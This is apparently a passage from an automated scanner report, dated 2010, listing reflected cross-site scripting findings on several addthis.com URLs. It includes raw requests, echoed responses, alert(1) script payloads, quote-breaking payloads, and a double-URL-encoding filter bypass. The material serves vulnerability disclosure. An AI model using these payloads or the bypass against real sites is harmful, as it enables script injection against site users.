Date: Sat, 20 Nov 2010 16:52:54 GMT
Server: Apache
Vary: Cookie
Content-Length: 20140
Connection: close
Content-Type: text/html; charset=utf-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <h1> domainbff31<a b=c>ace790abb9 </h1> ...[SNIP]...
The value of the fn request parameter is copied into the HTML document as plain text between tags. The payload f9815<script>alert(1)</script>172a4ed3072 was submitted in the fn parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the q request parameter is copied into the HTML document as plain text between tags. The payload f1910<script>alert(1)</script>016f7840526 was submitted in the q parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the componentTypeViewerList request parameter is copied into the XML document as plain text between tags. The payload 18780%253ca%2520xmlns%253aa%253d%2527http%253a%252f%252fwww%252ew3%252eorg%252f1999%252fxhtml%2527%253e%253ca%253abody%2520onload%253d%2527alert%25281%2529%2527%252f%253e%253c%252fa%253eb4ced27665b was submitted in the componentTypeViewerList parameter. This input was echoed as 18780<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>b4ced27665b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the componentTypeViewerList request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8f34c<script>alert(1)</script>318892cabab was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /bookmark.php8f34c<script>alert(1)</script>318892cabab HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.0 404 Not Found
Date: Sat, 20 Nov 2010 16:56:15 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=p81rjp77olcodosmm631qfhim3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1473
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Not found</title> <l ...[SNIP]... <strong>bookmark.php8f34c<script>alert(1)</script>318892cabab</strong> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6eb9a"-alert(1)-"112f98354b8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bookmark.php6eb9a"-alert(1)-"112f98354b8 HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.0 404 Not Found
Date: Sat, 20 Nov 2010 16:56:15 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=15fm6nh0l1cvvqskakcu5rumi5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1447
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Not found</title> <l ...[SNIP]... <script type="text/javascript"> var u = "/404/bookmark.php6eb9a"-alert(1)-"112f98354b8"; if (typeof utmx != "undefined" && utmx('combination') != undefined) { u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination'); } if (window._gat) { var gaPageTracker = _gat._get ...[SNIP]...
2.91. http://www.addthis.com/bookmark.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.addthis.com
Path: /bookmark.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6c07c"-alert(1)-"345ff452a56 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bookmark.php/6c07c"-alert(1)-"345ff452a56 HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 16:56:08 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
Content-Length: 88293
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>AddThis Social Bookm ...[SNIP]... <script type="text/javascript"> var u = "/bookmark.php/6c07c"-alert(1)-"345ff452a56"; if (typeof utmx != "undefined" && utmx('combination') != undefined) { u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination'); } if (window._gat) { var gaPageTracker = _gat._get ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c82d9<script>alert(1)</script>fdcbc7a51dd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3af4b"-alert(1)-"778de5bfb4b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.0 404 Not Found
Date: Sat, 20 Nov 2010 17:10:15 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
Content-Length: 1593
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Not found</title> <l ...[SNIP]... <script type="text/javascript"> var u = "/404/bookmark.php6eb9a%22-alert(1)-%22HOYT.LLC.XSS.PoC.11.20.2010.WWW.ADDTHIS.COM.1655.GMT3af4b"-alert(1)-"778de5bfb4b"; if (typeof utmx != "undefined" && utmx('combination') != undefined) { u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination'); } if (window._gat) { var gaPageTracker = _gat._get ...[SNIP]...
2.94. http://www.addthis.com/bookmark.php6eb9a%22-alert(1)-%22HOYT.LLC.XSS.PoC.11.20.2010.WWW.ADDTHIS.COM.1655.GMT [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 52985<script>alert(1)</script>c2109c4da0c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8cfd7<script>alert(1)</script>e725d8a4db7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 278d6"-alert(1)-"ce0f54c8f21 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2a74f<script>alert(1)</script>b715ff394f5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /labs2a74f<script>alert(1)</script>b715ff394f5/sharebar HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.0 404 Not Found
Date: Sat, 20 Nov 2010 16:56:07 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=r1uiniigtcm2o9665dceg3l7a1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1475
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Not found</title> <l ...[SNIP]... <strong>labs2a74f<script>alert(1)</script>b715ff394f5/sharebar</strong> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 98e40"-alert(1)-"f69a97632a6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /labs98e40"-alert(1)-"f69a97632a6/sharebar HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.0 404 Not Found
Date: Sat, 20 Nov 2010 16:56:06 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=s25hh7o8aj9hivfipoa2r9g376; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1449
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Not found</title> <l ...[SNIP]... <script type="text/javascript"> var u = "/404/labs98e40"-alert(1)-"f69a97632a6/sharebar"; if (typeof utmx != "undefined" && utmx('combination') != undefined) { u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination'); } if (window._gat) { var gaPageTracker = ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 22a81<script>alert(1)</script>017d8df923a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /labs/sharebar22a81<script>alert(1)</script>017d8df923a HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.0 404 Not Found
Date: Sat, 20 Nov 2010 16:56:11 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=9505qf7soqfl8tp9tjhbvrnva0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1475
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Not found</title> <l ...[SNIP]... <strong>labs/sharebar22a81<script>alert(1)</script>017d8df923a</strong> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bea60"-alert(1)-"fb95837da68 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /labs/sharebarbea60"-alert(1)-"fb95837da68 HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.0 404 Not Found
Date: Sat, 20 Nov 2010 16:56:08 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=t0jjtrn86ervt30up9qccjvna3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1449
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Not found</title> <l ...[SNIP]... <script type="text/javascript"> var u = "/404/labs/sharebarbea60"-alert(1)-"fb95837da68"; if (typeof utmx != "undefined" && utmx('combination') != undefined) { u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination'); } if (window._gat) { var gaPageTracker = _gat._get ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 48c30<script>alert(1)</script>97c119f9d4c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /labs48c30<script>alert(1)</script>97c119f9d4c/sharebar/ HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.0 404 Not Found
Date: Sat, 20 Nov 2010 16:56:06 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=gumktcoa631jau9eq58bo3a6n4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1477
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Not found</title> <l ...[SNIP]... <strong>labs48c30<script>alert(1)</script>97c119f9d4c/sharebar/</strong> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c3c93"-alert(1)-"015370cd7b1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /labsc3c93"-alert(1)-"015370cd7b1/sharebar/ HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.0 404 Not Found
Date: Sat, 20 Nov 2010 16:56:06 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=4vvuq8gvavofrrm6aajh0vbc10; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1451
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Not found</title> <l ...[SNIP]... <script type="text/javascript"> var u = "/404/labsc3c93"-alert(1)-"015370cd7b1/sharebar/"; if (typeof utmx != "undefined" && utmx('combination') != undefined) { u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination'); } if (window._gat) { var gaPageTracker = ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 2b79e<script>alert(1)</script>6e72fe07aab was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /labs/sharebar2b79e<script>alert(1)</script>6e72fe07aab/ HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.0 404 Not Found
Date: Sat, 20 Nov 2010 16:56:08 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=4o1js9c6qoqlapr84rrevdmjm7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1477
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Not found</title> <l ...[SNIP]... <strong>labs/sharebar2b79e<script>alert(1)</script>6e72fe07aab/</strong> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8ab65"-alert(1)-"a907e3ac5d9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /labs/sharebar8ab65"-alert(1)-"a907e3ac5d9/ HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.0 404 Not Found
Date: Sat, 20 Nov 2010 16:56:07 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=0mcpu733knmj17rqsvpush0ek3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1451
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Not found</title> <l ...[SNIP]... <script type="text/javascript"> var u = "/404/labs/sharebar8ab65"-alert(1)-"a907e3ac5d9/"; if (typeof utmx != "undefined" && utmx('combination') != undefined) { u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination'); } if (window._gat) { var gaPageTracker = _gat._ge ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6b687"-alert(1)-"5544c0af5fb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /services6b687"-alert(1)-"5544c0af5fb/submit HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.0 404 Not Found
Date: Sat, 20 Nov 2010 16:56:06 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=ro0pprbgg02gv0ps8843aufqj2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1453
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Not found</title> <l ...[SNIP]... <script type="text/javascript"> var u = "/404/services6b687"-alert(1)-"5544c0af5fb/submit"; if (typeof utmx != "undefined" && utmx('combination') != undefined) { u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination'); } if (window._gat) { var gaPageTracker = _g ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d48f3<script>alert(1)</script>7fec965f9fb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /servicesd48f3<script>alert(1)</script>7fec965f9fb/submit HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.0 404 Not Found
Date: Sat, 20 Nov 2010 16:56:06 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=u4ab98dm5nk5ev3e48a1bl69a7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1479
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Not found</title> <l ...[SNIP]... <strong>servicesd48f3<script>alert(1)</script>7fec965f9fb/submit</strong> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f28ad"-alert(1)-"9b939b22c7d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /services/submitf28ad"-alert(1)-"9b939b22c7d HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.0 404 Not Found
Date: Sat, 20 Nov 2010 16:56:07 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=epv9ku1jg9s8m3t3j94jsm1c34; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1453
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Not found</title> <l ...[SNIP]... <script type="text/javascript"> var u = "/404/services/submitf28ad"-alert(1)-"9b939b22c7d"; if (typeof utmx != "undefined" && utmx('combination') != undefined) { u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination'); } if (window._gat) { var gaPageTracker = _gat._get ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 57fdb<script>alert(1)</script>57c7a554130 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /services/submit57fdb<script>alert(1)</script>57c7a554130 HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.0 404 Not Found
Date: Sat, 20 Nov 2010 16:56:08 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=r6d67jvi441r6bg5srbf399u47; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1479
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Not found</title> <l ...[SNIP]... <strong>services/submit57fdb<script>alert(1)</script>57c7a554130</strong> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 12552"-alert(1)-"62b69e85072 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2ab00<script>alert(1)</script>7d42c08a525 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 75a7b"-alert(1)-"0a892740684 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 49a57<script>alert(1)</script>3b229a5bc8c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 41da8<script>alert(1)</script>0930d1726d1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
